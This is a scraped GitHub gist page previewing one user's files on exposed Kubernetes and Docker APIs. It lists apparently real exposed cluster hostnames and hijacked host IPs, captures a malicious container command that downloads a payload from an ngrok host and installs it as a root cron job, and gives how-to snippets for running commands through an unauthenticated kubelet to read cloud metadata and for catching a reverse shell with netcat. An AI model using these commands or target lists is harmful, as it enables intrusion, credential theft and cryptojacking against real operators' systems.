Instantly share code, notes, and snippets.

View exposedkubernetes.txt
https://api.internal.3ds-servicebuilder.com
https://api.internal.aaron.aaron.slalomdev.io
https://api.internal.abhishek.k8s.local
https://api.internal.alboom.k8s.local
https://api.internal.aob-stemcell-prod.k8s.local
https://api.internal.automation.darwin.ngiris.io
https://api.internal.blockguru.us
https://api.internal.bqc-qsefe.k8s.local
https://api.internal.c1-k8s.aws.storageos.net
https://api.internal.cluster.lorentzca.me
View infected-kubernetes.md

The following is appearing in 108 kubernetes systems that i have tracked so far.

"containers": [
                    {
                        "command": [
                            "sh",
                            "-c",
View Docker-XMR.md

Hijacked Systems

All the following IPs have the docker API exposed and have been hijacked to mine XMR

101.132.125.134
101.251.243.178
View awsranges.txt
"18.208.0.0/13", "52.95.245.0/24", "52.194.0.0/15", "54.155.0.0/16", "54.196.0.0/15", "52.94.22.0/24", "52.95.255.112/28", "13.210.0.0/15", "52.94.17.0/24", "52.95.154.0/23", "52.95.212.0/22", "54.239.0.240/28", "54.241.0.0/16", "184.169.128.0/17", "216.182.224.0/21", "52.74.0.0/16", "54.168.0.0/16", "54.239.54.0/23", "52.119.224.0/21", "52.219.64.0/22", "54.238.0.0/16", "216.182.232.0/22", "52.92.72.0/22", "172.96.98.0/24", "13.125.0.0/16", "13.248.24.0/22", "54.193.0.0/16", "52.95.104.0/22", "52.119.249.0/24", "52.92.64.0/22", "52.93.5.0/24", "52.144.193.128/26", "54.250.0.0/16", "107.20.0.0/14", "52.93.8.0/22", "52.94.224.0/20", "52.46.224.0/20", "52.95.156.0/24", "54.180.0.0/15", "52.30.0.0/15", "52.94.8.0/24", "52.94.249.64/28", "54.92.0.0/17", "54.154.0.0/16", "67.202.0.0/18", "103.246.148.0/23", "52.93.20.17/32", "52.95.0.0/20", "205.251.246.0/24", "52.94.248.112/28", "52.92.39.0/24", "52.95.150.0/24", "52.219.60.0/23", "52.94.198.32/28", "54.232.0.0/16", "52.93.249.0/24", "207.171.160.0/20", "52.92.48
View greynoise.json
{
"updated": "2018-09-10 18:07:50",
"type": "http path",
"duration": "24 hours",
"data": [
{
"path": "/",
"position": 1
},
{
View docker.json
[
{
"Id": "33bac08a2c3b6cf7190f9c82b610d03ad88d43790e6ac03ea9b5eb2956006737",
"Names": [
"/mystifying_kilby1"
],
"Image": "sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265",
"ImageID": "sha256:9d899e1f01f4d19923e8212ffa34bfbb0c21d4ee498fff0b2c2f69b9bf665265",
"Command": "/bin/sh -c 'curl --retry 3 -m 60 -o /tmpbb2716/tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd \"http://4e69fa7d.ngrok.io/f/serve?l=d&r=c3cdca1d8e60925a08dc612c426a936f\";echo \"* * * * * root sh /tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd\" >/tmpbb2716/etc/crontab;echo \"* * * * * root sh /tmp/tmpfilec3cdca1d8e60925a08dc612c426a936fd\" >/tmpbb2716/etc/cron.d/1m;chroot /tmpbb2716 sh -c \"cron || crond\"'",
"Created": 1534969253,
View do.md

How to connect to Digital Ocean Metadata endpoint

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "cmd=busybox wget -q -O - curl http://169.254.169.254/metadata/v1/"

View kube.md

Grabbing Namespace and POD and container from kubernetes API.

{
      "metadata": {
        "name": "spinnaker-k8spray-clouddriver-566c56787c-l6mnj",
        "namespace": "k8spray",
        "uid": "e36e6e6e-8974-11e8-9663-02ceba770664",
        "creationTimestamp": null
View reverseshell.md

How to get reverse shell

Setup a listener on your VPS to connect back to

nc -lvp 4444
View aws.md

How to connect to AWS Metadata endpoint

Request

curl -sk https://IP:10250/run/NAMESPACE/POD/CONTAINERNAME -d "cmd=busybox wget -q -O - http://169.254.169.254/latest/meta-data/"